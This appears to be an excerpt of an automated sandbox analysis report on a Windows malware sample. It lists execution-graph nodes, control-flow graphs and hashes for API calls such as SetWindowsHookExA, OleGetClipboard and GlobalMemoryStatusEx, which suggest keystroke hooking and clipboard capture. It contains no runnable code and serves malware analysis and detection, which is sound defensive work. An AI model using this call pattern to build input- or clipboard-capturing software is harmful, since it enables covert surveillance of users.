                                                                                                                  Execution Coverage:13.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0.7%
                                                                                                                  Total number of Nodes:405
                                                                                                                  Total number of Limit Nodes:54
                                                                                                                  execution_graph 40683 640a250 DuplicateHandle 40684 640a2e6 40683->40684 40198 c90848 40200 c9084e 40198->40200 40199 c9091b 40200->40199 40203 c9137f 40200->40203 40214 c91487 40200->40214 40204 c91383 40203->40204 40205 c912e6 40203->40205 40204->40205 40211 c91487 6 API calls 40204->40211 40225 c97d90 40204->40225 40232 c97d80 40204->40232 40239 c97ea8 40204->40239 40247 640d720 40204->40247 40253 640d711 40204->40253 40259 6403468 40204->40259 40265 6403462 40204->40265 40205->40200 40211->40204 40215 c91396 40214->40215 40216 c91484 40215->40216 40217 640d720 SetWindowsHookExA 40215->40217 40218 640d711 SetWindowsHookExA 40215->40218 40219 6403462 3 API calls 40215->40219 40220 6403468 3 API calls 40215->40220 40221 c97ea8 2 API calls 40215->40221 40222 c97d80 2 API calls 40215->40222 40223 c97d90 2 API calls 40215->40223 40224 c91487 6 API calls 40215->40224 40216->40200 40217->40215 40218->40215 40219->40215 40220->40215 40221->40215 40222->40215 40223->40215 40224->40215 40227 c97da6 40225->40227 40226 c97e57 40228 c97f12 40226->40228 40277 c9f612 40226->40277 40282 c9f7bf 40226->40282 40227->40226 40271 c98718 40227->40271 40228->40204 40234 c97da6 40232->40234 40233 c97e57 40235 c97f12 40233->40235 40236 c9f7bf 2 API calls 40233->40236 40237 c9f612 2 API calls 40233->40237 40234->40233 40238 c98718 2 API calls 40234->40238 40235->40204 40236->40235 40237->40235 40238->40234 40240 c97eb2 40239->40240 40242 c97ecc 40240->40242 40243 641fb58 2 API calls 40240->40243 40244 641fb68 2 API calls 40240->40244 40241 c97f12 40241->40204 40242->40241 40245 c9f7bf 2 API calls 40242->40245 40246 c9f612 2 API calls 40242->40246 40243->40242 40244->40242 40245->40241 40246->40241 40248 640d728 40247->40248 40249 640d76d 40248->40249 40457 640d770 40248->40457 40461 640d802 40248->40461 40465 640d780 40248->40465 40249->40204 40254 640d728 40253->40254 40255 640d76d 40254->40255 40256 640d770 SetWindowsHookExA 40254->40256 40257 640d780 SetWindowsHookExA 40254->40257 40258 640d802 SetWindowsHookExA 40254->40258 40255->40204 40256->40254 40257->40254 40258->40254 40260 640347a 40259->40260 40262 640352b 40260->40262 40473 64013d4 40260->40473 40262->40204 40263 64034f1 40478 64013f4 40263->40478 40266 6403469 40265->40266 40267 64013d4 2 API calls 40266->40267 40269 640352b 40266->40269 40268 64034f1 40267->40268 40270 64013f4 KiUserCallbackDispatcher 40268->40270 40269->40204 40270->40269 40272 c9871d 40271->40272 40273 c98f2d 40272->40273 40287 c99f98 40272->40287 40292 c9a04b 40272->40292 40297 c99fa8 40272->40297 40273->40227 40278 c9f639 40277->40278 40279 c9f6af 40278->40279 40402 c9f840 40278->40402 40408 c9f850 40278->40408 40283 c9f7ca 40282->40283 40443 641fb58 40283->40443 40450 641fb68 40283->40450 40284 c9f7d1 40284->40228 40289 c99fa8 40287->40289 40288 c9a061 40289->40288 40302 c9a098 40289->40302 40309 c9a0a8 40289->40309 40293 c9a020 40292->40293 40294 c9a061 40293->40294 40295 c9a098 2 API calls 40293->40295 40296 c9a0a8 2 API calls 40293->40296 40295->40293 40296->40293 40299 c99fc5 40297->40299 40298 c9a061 40299->40298 40300 c9a098 2 API calls 40299->40300 40301 c9a0a8 2 API calls 40299->40301 40300->40299 40301->40299 40304 c9a0c2 40302->40304 40303 c9a182 40304->40303 40316 c9a2d8 40304->40316 40326 c9a4d6 40304->40326 40336 c9a1c0 40304->40336 40346 c9a1bb 40304->40346 40311 c9a0c2 40309->40311 40310 c9a182 40311->40310 40312 c9a2d8 2 API calls 40311->40312 40313 c9a1bb 2 API calls 40311->40313 40314 c9a1c0 2 API calls 40311->40314 40315 c9a4d6 2 API calls 40311->40315 40312->40311 40313->40311 40314->40311 40315->40311 40318 c9a1e1 40316->40318 40317 c9a505 40317->40304 40318->40317 40319 c9a2d8 2 API calls 40318->40319 40320 c9a1bb 2 API calls 40318->40320 40321 c9a1c0 2 API calls 40318->40321 40322 c9a4d6 2 API calls 40318->40322 40356 c9de28 40318->40356 40362 c9de38 40318->40362 40368 c9df00 40318->40368 40319->40318 40320->40318 40321->40318 40322->40318 40327 c9a1e1 40326->40327 40328 c9a505 40327->40328 40329 c9de28 2 API calls 40327->40329 40330 c9de38 2 API calls 40327->40330 40331 c9df00 2 API calls 40327->40331 40332 c9a2d8 2 API calls 40327->40332 40333 c9a1bb 2 API calls 40327->40333 40334 c9a1c0 2 API calls 40327->40334 40335 c9a4d6 2 API calls 40327->40335 40328->40304 40329->40327 40330->40327 40331->40327 40332->40327 40333->40327 40334->40327 40335->40327 40338 c9a1e1 40336->40338 40337 c9a505 40337->40304 40338->40337 40339 c9de28 2 API calls 40338->40339 40340 c9de38 2 API calls 40338->40340 40341 c9df00 2 API calls 40338->40341 40342 c9a2d8 2 API calls 40338->40342 40343 c9a1bb 2 API calls 40338->40343 40344 c9a1c0 2 API calls 40338->40344 40345 c9a4d6 2 API calls 40338->40345 40339->40338 40340->40338 40341->40338 40342->40338 40343->40338 40344->40338 40345->40338 40348 c9a1c0 40346->40348 40347 c9a505 40347->40304 40348->40347 40349 c9a2d8 2 API calls 40348->40349 40350 c9a1bb 2 API calls 40348->40350 40351 c9a1c0 2 API calls 40348->40351 40352 c9a4d6 2 API calls 40348->40352 40353 c9de28 2 API calls 40348->40353 40354 c9de38 2 API calls 40348->40354 40355 c9df00 2 API calls 40348->40355 40349->40348 40350->40348 40351->40348 40352->40348 40353->40348 40354->40348 40355->40348 40357 c9de05 40356->40357 40359 c9de33 40356->40359 40357->40318 40358 c9de47 40358->40318 40359->40358 40373 c9eed0 40359->40373 40363 c9de47 40362->40363 40365 c9dea7 40362->40365 40363->40318 40364 c9df6b 40364->40318 40365->40364 40367 c9eed0 2 API calls 40365->40367 40366 c9e37e 40366->40318 40367->40366 40369 c9df1a 40368->40369 40370 c9df6b 40369->40370 40372 c9eed0 2 API calls 40369->40372 40370->40318 40371 c9e37e 40371->40318 40372->40371 40378 c9efa8 40373->40378 40383 c9ef18 40373->40383 40389 c9ef08 40373->40389 40374 c9e37e 40374->40318 40379 c9ef6e 40378->40379 40380 c9ef51 40378->40380 40379->40374 40380->40379 40395 c9eff0 40380->40395 40398 c9efd7 40380->40398 40384 c9ef25 40383->40384 40386 c9ef4d 40383->40386 40384->40374 40385 c9ef6e 40385->40374 40386->40385 40387 c9eff0 GlobalMemoryStatusEx 40386->40387 40388 c9efd7 GlobalMemoryStatusEx 40386->40388 40387->40386 40388->40386 40390 c9ef25 40389->40390 40392 c9ef4d 40389->40392 40390->40374 40391 c9ef6e 40391->40374 40392->40391 40393 c9eff0 GlobalMemoryStatusEx 40392->40393 40394 c9efd7 GlobalMemoryStatusEx 40392->40394 40393->40392 40394->40392 40396 c9f036 GlobalMemoryStatusEx 40395->40396 40397 c9f066 40396->40397 40397->40380 40399 c9efdc GlobalMemoryStatusEx 40398->40399 40401 c9f066 40399->40401 40401->40380 40403 c9f855 40402->40403 40404 c9f883 40403->40404 40414 c9f890 40403->40414 40421 c9fb06 40403->40421 40428 c9fa87 40403->40428 40404->40278 40413 c9f855 40408->40413 40409 c9f883 40409->40278 40410 c9f890 2 API calls 40410->40413 40411 c9fa87 2 API calls 40411->40413 40412 c9fb06 2 API calls 40412->40413 40413->40409 40413->40410 40413->40411 40413->40412 40416 c9f8b7 40414->40416 40415 c9fb32 40416->40415 40418 c9fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx 40416->40418 40420 c9fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx 40416->40420 40435 c9fd19 40416->40435 40439 c9ff9c 40416->40439 40418->40416 40420->40416 40423 c9f916 40421->40423 40422 c9fb32 40423->40422 40424 c9fd19 2 API calls 40423->40424 40425 c9fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx 40423->40425 40426 c9ff9c 2 API calls 40423->40426 40427 c9fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx 40423->40427 40424->40423 40425->40423 40426->40423 40427->40423 40430 c9f916 40428->40430 40429 c9fb32 40430->40429 40431 c9fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx 40430->40431 40432 c9fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx 40430->40432 40433 c9fd19 2 API calls 40430->40433 40434 c9ff9c 2 API calls 40430->40434 40431->40430 40432->40430 40433->40430 40434->40430 40438 c9fd47 40435->40438 40436 c9df00 2 API calls 40436->40438 40437 c9fd8a 40437->40416 40438->40436 40438->40437 40442 c9fd47 40439->40442 40440 c9df00 2 API calls 40440->40442 40441 c9fd8a 40441->40416 40442->40440 40442->40441 40445 641fb7d 40443->40445 40444 641fd92 40444->40284 40445->40444 40446 c9de28 GlobalMemoryStatusEx GlobalMemoryStatusEx 40445->40446 40447 c9de38 GlobalMemoryStatusEx GlobalMemoryStatusEx 40445->40447 40448 c9e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx 40445->40448 40449 c9df00 GlobalMemoryStatusEx GlobalMemoryStatusEx 40445->40449 40446->40445 40447->40445 40448->40445 40449->40445 40452 641fb7d 40450->40452 40451 641fd92 40451->40284 40452->40451 40453 c9de28 GlobalMemoryStatusEx GlobalMemoryStatusEx 40452->40453 40454 c9de38 GlobalMemoryStatusEx GlobalMemoryStatusEx 40452->40454 40455 c9e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx 40452->40455 40456 c9df00 GlobalMemoryStatusEx GlobalMemoryStatusEx 40452->40456 40453->40452 40454->40452 40455->40452 40456->40452 40459 640d780 40457->40459 40458 640d800 40458->40248 40459->40458 40469 640c970 40459->40469 40462 640d7bd 40461->40462 40463 640c970 SetWindowsHookExA 40462->40463 40464 640d800 40462->40464 40463->40462 40464->40248 40467 640d79d 40465->40467 40466 640d800 40466->40248 40467->40466 40468 640c970 SetWindowsHookExA 40467->40468 40468->40467 40471 640d988 SetWindowsHookExA 40469->40471 40472 640da12 40471->40472 40472->40459 40474 64013df 40473->40474 40482 6404a20 40474->40482 40491 6404a30 40474->40491 40475 6403ada 40475->40263 40479 64013ff 40478->40479 40481 640b413 40479->40481 40539 6409e54 40479->40539 40481->40262 40483 6404a30 40482->40483 40500 6404fa0 40483->40500 40505 6404f91 40483->40505 40484 6404ade 40485 6404670 GetModuleHandleW 40484->40485 40487 6404b0a 40484->40487 40486 6404b4e 40485->40486 40490 64064ad CreateWindowExW 40486->40490 40490->40487 40492 6404a5b 40491->40492 40498 6404fa0 GetModuleHandleW 40492->40498 40499 6404f91 GetModuleHandleW 40492->40499 40493 6404ade 40494 6404670 GetModuleHandleW 40493->40494 40496 6404b0a 40493->40496 40495 6404b4e 40494->40495 40534 64064ad 40495->40534 40498->40493 40499->40493 40501 6404fcd 40500->40501 40502 640504e 40501->40502 40510 6405100 40501->40510 40520 6405110 40501->40520 40506 6404fa0 40505->40506 40507 640504e 40506->40507 40508 6405100 GetModuleHandleW 40506->40508 40509 6405110 GetModuleHandleW 40506->40509 40508->40507 40509->40507 40511 6405110 40510->40511 40513 6405149 40511->40513 40530 6404670 40511->40530 40514 6404670 GetModuleHandleW 40513->40514 40519 6405314 40513->40519 40515 640529a 40514->40515 40516 6404670 GetModuleHandleW 40515->40516 40515->40519 40517 64052e8 40516->40517 40518 6404670 GetModuleHandleW 40517->40518 40517->40519 40518->40519 40519->40502 40521 6405125 40520->40521 40522 6404670 GetModuleHandleW 40521->40522 40524 6405149 40521->40524 40522->40524 40523 6405314 40523->40502 40524->40523 40525 6404670 GetModuleHandleW 40524->40525 40526 640529a 40525->40526 40526->40523 40527 6404670 GetModuleHandleW 40526->40527 40528 64052e8 40527->40528 40528->40523 40529 6404670 GetModuleHandleW 40528->40529 40529->40523 40531 6405450 GetModuleHandleW 40530->40531 40533 64054c5 40531->40533 40533->40513 40535 64064b1 40534->40535 40536 64064e5 CreateWindowExW 40534->40536 40535->40496 40538 640661c 40536->40538 40540 640b428 KiUserCallbackDispatcher 40539->40540 40542 640b496 40540->40542 40542->40479 40543 c53160 40545 c5317c 40543->40545 40544 c5328c 40545->40544 40546 641fb58 GlobalMemoryStatusEx GlobalMemoryStatusEx 40545->40546 40547 641fb68 GlobalMemoryStatusEx GlobalMemoryStatusEx 40545->40547 40546->40545 40547->40545 40548 6405448 40549 6405450 GetModuleHandleW 40548->40549 40551 64054c5 40549->40551 40552 640bca8 40553 640bcb3 40552->40553 40555 640bcc3 40553->40555 40556 6409fec 40553->40556 40557 640bcf8 OleInitialize 40556->40557 40558 640bd5c 40557->40558 40558->40555 40559 afd044 40560 afd05c 40559->40560 40561 afd0b6 40560->40561 40568 64066a0 40560->40568 40574 64067dd 40560->40574 40577 64047a4 40560->40577 40585 6404794 40560->40585 40589 640ae33 40560->40589 40598 64066b0 40560->40598 40569 64066b0 40568->40569 40570 6404794 GetModuleHandleW 40569->40570 40571 64066e2 40570->40571 40572 64047a4 2 API calls 40571->40572 40573 64066f7 40572->40573 40573->40561 40604 64047cc 40574->40604 40576 64067e7 40576->40561 40580 64047af 40577->40580 40578 640aec1 40620 6409dfc 40578->40620 40580->40578 40581 640aeb1 40580->40581 40608 640afd8 40581->40608 40614 640afe8 40581->40614 40582 640aebf 40586 640479f 40585->40586 40587 64067e7 40586->40587 40588 64047cc GetModuleHandleW 40586->40588 40587->40561 40588->40587 40590 640ae3a 40589->40590 40592 640ae4a 40589->40592 40590->40561 40591 640aec1 40593 6409dfc 2 API calls 40591->40593 40592->40591 40595 640aeb1 40592->40595 40594 640aebf 40593->40594 40596 640afd8 2 API calls 40595->40596 40597 640afe8 2 API calls 40595->40597 40596->40594 40597->40594 40599 64066d6 40598->40599 40600 6404794 GetModuleHandleW 40599->40600 40601 64066e2 40600->40601 40602 64047a4 2 API calls 40601->40602 40603 64066f7 40602->40603 40603->40561 40605 64047d7 40604->40605 40606 6404670 GetModuleHandleW 40605->40606 40607 64068b7 40605->40607 40606->40607 40607->40576 40610 640afe8 40608->40610 40609 6409dfc 2 API calls 40609->40610 40610->40609 40611 640b0d2 40610->40611 40627 640b4b8 40610->40627 40632 640b4c8 40610->40632 40611->40582 40615 640aff6 40614->40615 40616 6409dfc 2 API calls 40615->40616 40617 640b0d2 40615->40617 40618 640b4c8 OleGetClipboard 40615->40618 40619 640b4b8 OleGetClipboard 40615->40619 40616->40615 40617->40582 40618->40615 40619->40615 40621 6409e07 40620->40621 40622 640b1d4 40621->40622 40623 640b12a 40621->40623 40625 64047a4 OleGetClipboard 40622->40625 40624 640b182 CallWindowProcW 40623->40624 40626 640b131 40623->40626 40624->40626 40625->40626 40626->40582 40628 640b4be 40627->40628 40629 640b4ae 40628->40629 40637 640ba37 40628->40637 40643 640ba88 40628->40643 40629->40610 40633 640b4e7 40632->40633 40634 640b52e 40633->40634 40635 640ba37 OleGetClipboard 40633->40635 40636 640ba88 OleGetClipboard 40633->40636 40634->40610 40635->40633 40636->40633 40638 640baa4 40637->40638 40640 640ba3d 40637->40640 40638->40628 40639 640bab9 40639->40628 40640->40638 40649 640bad0 40640->40649 40660 640bac3 40640->40660 40645 640ba90 40643->40645 40644 640baa4 40644->40628 40645->40644 40647 640bad0 OleGetClipboard 40645->40647 40648 640bac3 OleGetClipboard 40645->40648 40646 640bab9 40646->40628 40647->40646 40648->40646 40650 640bae2 40649->40650 40651 640bafd 40650->40651 40653 640bb41 40650->40653 40656 640bad0 OleGetClipboard 40651->40656 40657 640bac3 OleGetClipboard 40651->40657 40652 640bb03 40652->40639 40655 640bbc1 40653->40655 40671 640bd88 40653->40671 40675 640bd98 40653->40675 40654 640bbdf 40654->40639 40655->40639 40656->40652 40657->40652 40661 640baca 40660->40661 40662 640bb41 40661->40662 40663 640bafd 40661->40663 40665 640bbc1 40662->40665 40668 640bd88 OleGetClipboard 40662->40668 40669 640bd98 OleGetClipboard 40662->40669 40666 640bad0 OleGetClipboard 40663->40666 40667 640bac3 OleGetClipboard 40663->40667 40664 640bbdf 40664->40639 40665->40639 40670 640bb03 40666->40670 40667->40670 40668->40664 40669->40664 40670->40639 40673 640bd98 40671->40673 40674 640bdd3 40673->40674 40679 640b820 40673->40679 40674->40654 40677 640bdad 40675->40677 40676 640b820 OleGetClipboard 40676->40677 40677->40676 40678 640bdd3 40677->40678 40678->40654 40680 640be40 OleGetClipboard 40679->40680 40682 640beda 40680->40682
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-3723351465
                                                                                                                  • Opcode ID: 49137f2f6683687c4b633c8596097806277e714613eb59f35dba28d50e5612f1
                                                                                                                  • Instruction ID: 0cf581e8300dc628700752c7f3c467ad2979685dc9bbd00268072df5081c508e
                                                                                                                  • Opcode Fuzzy Hash: 49137f2f6683687c4b633c8596097806277e714613eb59f35dba28d50e5612f1
                                                                                                                  • Instruction Fuzzy Hash: AAE23834A002098FDB65DF68C594A9EB7F2FF89310F5485AAD409EB365EB70ED85CB40
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-3723351465
                                                                                                                  • Opcode ID: ca3e9b67e4acd010e057fd46a6935a7639b6c5482b8f93ffc0315074e4a95b07
                                                                                                                  • Instruction ID: 818a0abffa4dedadc6c6b71cb2a8af1c367e6ad09be7bcd182f8d9b6b6f22f71
                                                                                                                  • Opcode Fuzzy Hash: ca3e9b67e4acd010e057fd46a6935a7639b6c5482b8f93ffc0315074e4a95b07
                                                                                                                  • Instruction Fuzzy Hash: AE524A70E102098FDF65DB68D5907AEB7B2EB49310F24896BE449DF391DB34D882CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1757 6417e78-6417e96 1758 6417e98-6417e9b 1757->1758 1759 6417eb2-6417eb5 1758->1759 1760 6417e9d-6417eab 1758->1760 1761 6417ec2-6417ec5 1759->1761 1762 6417eb7-6417ec1 1759->1762 1768 6417ead 1760->1768 1769 6417f1e-6417f34 1760->1769 1763 6417ec7-6417ee3 1761->1763 1764 6417ee8-6417eeb 1761->1764 1763->1764 1766 6417eed-6417f07 1764->1766 1767 6417f0c-6417f0e 1764->1767 1766->1767 1771 6417f10 1767->1771 1772 6417f15-6417f18 1767->1772 1768->1759 1775 6417f3a-6417f43 1769->1775 1776 641814f-6418159 1769->1776 1771->1772 1772->1758 1772->1769 1778 6417f49-6417f66 1775->1778 1779 641815a-641818f 1775->1779 1787 641813c-6418149 1778->1787 1788 6417f6c-6417f94 1778->1788 1783 6418191-6418194 1779->1783 1785 64183c9-64183cc 1783->1785 1786 641819a-64181a9 1783->1786 1789 64183ef-64183f2 1785->1789 1790 64183ce-64183ea 1785->1790 1798 64181c8-641820c 1786->1798 1799 64181ab-64181c6 1786->1799 1787->1775 1787->1776 1788->1787 1814 6417f9a-6417fa3 1788->1814 1791 64183f8-6418404 1789->1791 1792 641849d-641849f 1789->1792 1790->1789 1800 641840f-6418411 1791->1800 1794 64184a1 1792->1794 1795 64184a6-64184a9 1792->1795 1794->1795 1795->1783 1801 64184af-64184b8 1795->1801 1810 6418212-6418223 1798->1810 1811 641839d-64183b3 1798->1811 1799->1798 1804 6418413-6418419 1800->1804 1805 6418429-641842d 1800->1805 1808 641841b 1804->1808 1809 641841d-641841f 1804->1809 1812 641843b 1805->1812 1813 641842f-6418439 1805->1813 1808->1805 1809->1805 1824 6418229-6418246 1810->1824 1825 6418388-6418397 1810->1825 1811->1785 1817 6418440-6418442 1812->1817 1813->1817 1814->1779 1818 6417fa9-6417fc5 1814->1818 1820 6418453-641848c 1817->1820 1821 6418444-6418447 1817->1821 1826 6417fcb-6417ff5 1818->1826 1827 641812a-6418136 1818->1827 1820->1786 1840 6418492-641849c 1820->1840 1821->1801 1824->1825 1836 641824c-6418342 call 6416698 1824->1836 1825->1810 1825->1811 1841 6418120-6418125 1826->1841 1842 6417ffb-6418023 1826->1842 1827->1787 1827->1814 1890 6418350 1836->1890 1891 6418344-641834e 1836->1891 1841->1827 1842->1841 1849 6418029-6418057 1842->1849 1849->1841 1854 641805d-6418066 1849->1854 1854->1841 1855 641806c-641809e 1854->1855 1863 64180a0-64180a4 1855->1863 1864 64180a9-64180c5 1855->1864 1863->1841 1866 64180a6 1863->1866 1864->1827 1867 64180c7-641811e call 6416698 1864->1867 1866->1864 1867->1827 1892 6418355-6418357 1890->1892 1891->1892 1892->1825 1893 6418359-641835e 1892->1893 1894 6418360-641836a 1893->1894 1895 641836c 1893->1895 1896 6418371-6418373 1894->1896 1895->1896 1896->1825 1897 6418375-6418381 1896->1897 1897->1825
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q
                                                                                                                  • API String ID: 0-127220927
                                                                                                                  • Opcode ID: 19bfcac355cdc85858926508a5bca2be4ec56c19929b753c9275ce6761aa053c
                                                                                                                  • Instruction ID: 0c2398007df24fd1037549e0e2ee6cf138807dfdd4035de0cd06d92f4359690d
                                                                                                                  • Opcode Fuzzy Hash: 19bfcac355cdc85858926508a5bca2be4ec56c19929b753c9275ce6761aa053c
                                                                                                                  • Instruction Fuzzy Hash: 4B028F31B002098FDB55DB68D594AAEB7E2FF84314F24896AE8159F354DB35EC82CB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 539e4a89b7d0e03523a2968a9ec4b96d85bad1642f0ec267d3f4562efa8cdf14
                                                                                                                  • Instruction ID: 069047ba1e6a2d13c5b31e09ee5c58121d21cefb897d8dc0b0c283d738a0fc8c
                                                                                                                  • Opcode Fuzzy Hash: 539e4a89b7d0e03523a2968a9ec4b96d85bad1642f0ec267d3f4562efa8cdf14
                                                                                                                  • Instruction Fuzzy Hash: 4662AD34B002058FDB55DB68D594AAEBBF2EF85314F25846AE809EF350DB35ED46CB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 057a6a04eb981a289d124c82ee69400fa5469581c06b3e471da1cf85dda05abe
                                                                                                                  • Instruction ID: bdc9294b8f03f332cecd613cd3208b326d2b8217a3dc0e73441a3e4af153f627
                                                                                                                  • Opcode Fuzzy Hash: 057a6a04eb981a289d124c82ee69400fa5469581c06b3e471da1cf85dda05abe
                                                                                                                  • Instruction Fuzzy Hash: 79329234B102098FDF55DB68D890BAEB7B2FB88314F24856AE405DB355DB39EC42CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c55a2147f4a8b0df35ea5f829b22522828c123597e8ee968727821e63930bff7
                                                                                                                  • Instruction ID: 2af95d4ff24974d6fc81c00d4e201d9e23dac4979f84e84f66efce5b6cb68c7d
                                                                                                                  • Opcode Fuzzy Hash: c55a2147f4a8b0df35ea5f829b22522828c123597e8ee968727821e63930bff7
                                                                                                                  • Instruction Fuzzy Hash: AE22C1B1F102059FDB69DF64C8946AEB7B2EF84310F24886AE4599F385DB34DC42CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 863 6419250-6419275 864 6419277-641927a 863->864 865 6419280-6419295 864->865 866 6419b38-6419b3b 864->866 873 6419297-641929d 865->873 874 64192ad-64192c3 865->874 867 6419b61-6419b63 866->867 868 6419b3d-6419b5c 866->868 870 6419b65 867->870 871 6419b6a-6419b6d 867->871 868->867 870->871 871->864 875 6419b73-6419b7d 871->875 876 64192a1-64192a3 873->876 877 641929f 873->877 880 64192ce-64192d0 874->880 876->874 877->874 881 64192d2-64192d8 880->881 882 64192e8-6419359 880->882 883 64192da 881->883 884 64192dc-64192de 881->884 893 6419385-64193a1 882->893 894 641935b-641937e 882->894 883->882 884->882 899 64193a3-64193c6 893->899 900 64193cd-64193e8 893->900 894->893 899->900 905 6419413-641942e 900->905 906 64193ea-641940c 900->906 911 6419430-641944c 905->911 912 6419453-6419461 905->912 906->905 911->912 913 6419471-64194eb 912->913 914 6419463-641946c 912->914 920 6419538-641954d 913->920 921 64194ed-641950b 913->921 914->875 920->866 925 6419527-6419536 921->925 926 641950d-641951c 921->926 925->920 925->921 926->925
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-858218434
                                                                                                                  • Opcode ID: 45edaae753f0b286bb379c259250f7046904b596231f6b599009337688b0b03f
                                                                                                                  • Instruction ID: ee2ce68f398ba212921febe1293b0c11290e826b68582fbd0a983c83f535ff74
                                                                                                                  • Opcode Fuzzy Hash: 45edaae753f0b286bb379c259250f7046904b596231f6b599009337688b0b03f
                                                                                                                  • Instruction Fuzzy Hash: 9E914330B0061A9FDB55EF69D860BAF73F2BF85204F208566D809EB344EF709D468B91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2287 6419241-6419275 2288 6419277-641927a 2287->2288 2289 6419280-6419295 2288->2289 2290 6419b38-6419b3b 2288->2290 2297 6419297-641929d 2289->2297 2298 64192ad-64192c3 2289->2298 2291 6419b61-6419b63 2290->2291 2292 6419b3d-6419b5c 2290->2292 2294 6419b65 2291->2294 2295 6419b6a-6419b6d 2291->2295 2292->2291 2294->2295 2295->2288 2299 6419b73-6419b7d 2295->2299 2300 64192a1-64192a3 2297->2300 2301 641929f 2297->2301 2304 64192ce-64192d0 2298->2304 2300->2298 2301->2298 2305 64192d2-64192d8 2304->2305 2306 64192e8-6419359 2304->2306 2307 64192da 2305->2307 2308 64192dc-64192de 2305->2308 2317 6419385-64193a1 2306->2317 2318 641935b-641937e 2306->2318 2307->2306 2308->2306 2323 64193a3-64193c6 2317->2323 2324 64193cd-64193e8 2317->2324 2318->2317 2323->2324 2329 6419413-641942e 2324->2329 2330 64193ea-641940c 2324->2330 2335 6419430-641944c 2329->2335 2336 6419453-6419461 2329->2336 2330->2329 2335->2336 2337 6419471-64194eb 2336->2337 2338 6419463-641946c 2336->2338 2344 6419538-641954d 2337->2344 2345 64194ed-641950b 2337->2345 2338->2299 2344->2290 2349 6419527-6419536 2345->2349 2350 641950d-641951c 2345->2350 2349->2344 2349->2345 2350->2349
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000018.00000002.4588748090.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_24_2_6410000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q
                                                                                                                  • API String ID: 0-127220927
                                                                                                                  • Opcode ID: 6a29a38b5106b3d72910dd91537bd4044eeabd3a660c1110b9f1e7881d670e14
                                                                                                                  • Instruction ID: dbe83b7975ef4f336090614524995b23211810cf7dc4102d9cf547c238350668
                                                                                                                  • Opcode Fuzzy Hash: 6a29a38b5106b3d72910dd91537bd4044eeabd3a660c1110b9f1e7881d670e14
                                                                                                                  • Instruction Fuzzy Hash: 08513031B005069FDB55EB78D960BAE77F6EF88644F20856AD809DB394EA309C42CB91
